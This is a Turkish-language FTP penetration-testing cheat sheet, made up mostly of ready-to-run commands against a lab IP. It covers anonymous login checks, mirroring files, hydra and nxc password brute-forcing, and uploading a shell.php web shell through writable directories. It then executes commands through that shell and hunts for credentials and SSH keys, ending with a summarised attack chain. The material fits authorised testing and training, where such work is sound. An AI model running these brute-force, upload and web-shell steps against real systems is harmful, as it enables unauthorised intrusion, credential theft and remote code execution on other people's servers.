Skip to content

FTP Pentesting

FTP difficulty: kolay

FTP hâlâ dosya paylaşımı, eski entegrasyonlar ve yanlışlıkla açık bırakılmış anonymous kökler için görünür. Yazılabilir dizin + web root kesişimi klasik shell yoludur.

- Hedef IP, opsiyonel kimlik bilgisi
- Araçlar: nmap, ftp/lftp, wget, hydra, curl
  1. Banner, FTPS ve anonymous/NSE kontrollerini çalıştır.

  2. Listele / indir — hassas dosya, config, yedek.

  3. Yazma hakkı varsa web veya cron yoluna yükleme dene.

  4. Gerekirse kullanıcı/parola sprey; bounce/pasv tuhaflıklarını not et.

Terminal window
nmap -p21 -sV --script ftp-anon,ftp-syst,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.10.10.5
Terminal window
ftp 10.10.10.5
Name: anonymous
Password: anonymous
Terminal window
lftp -u anonymous, ftp://10.10.10.5
Terminal window
curl -v ftp://10.10.10.5/ --user anonymous:anonymous
Terminal window
wget -m ftp://anonymous:anonymous@10.10.10.5/
Terminal window
ftp 10.10.10.5
Terminal window
lftp -u user,Pass123 ftp://10.10.10.5
Terminal window
hydra -l anonymous -P pass.txt ftp://10.10.10.5
Terminal window
hydra -L users.txt -P pass.txt ftp://10.10.10.5 -t 4
Terminal window
nxc ftp 10.10.10.5 -u users.txt -p pass.txt
Terminal window
ftp 10.10.10.5
cd pub
put shell.php
ls
Terminal window
curl -T shell.php ftp://user:pass@10.10.10.5/www/
Terminal window
curl http://10.10.10.5/shell.php?cmd=id

Web yükleme yüzeyleri: File Upload.

Terminal window
nmap -p21 --script ssl-cert,ssl-enum-ciphers 10.10.10.5
Terminal window
lftp
set ftp:ssl-force true
open ftp://10.10.10.5
Terminal window
openssl s_client -connect 10.10.10.5:21 -starttls ftp
Terminal window
nmap -p21 --script ftp-bounce 10.10.10.5
PORT komutu ile üçüncü taraf taraması (eski bounce) — modern sunucularda genelde kapalı
Active mode firewall traversal tuhaflıkları log/IDS üretebilir
*.bak, *.sql, *.env, id_rsa, web.config, wp-config.php
ftpstatus / .ftpaccess / proftpd.conf sızıntıları
Terminal window
find . -iname '*pass*' -o -iname '*.env' -o -iname '*config*' 2>/dev/null | head

nmap · FTP NSE

embedded tool
Generated command
nmap -p21 -sV --script ftp-anon,ftp-syst,ftp-bounce 10.10.10.5
ftp-anon → wget mirror
→ credentials in backup
→ writable www/ → php shell → SSH key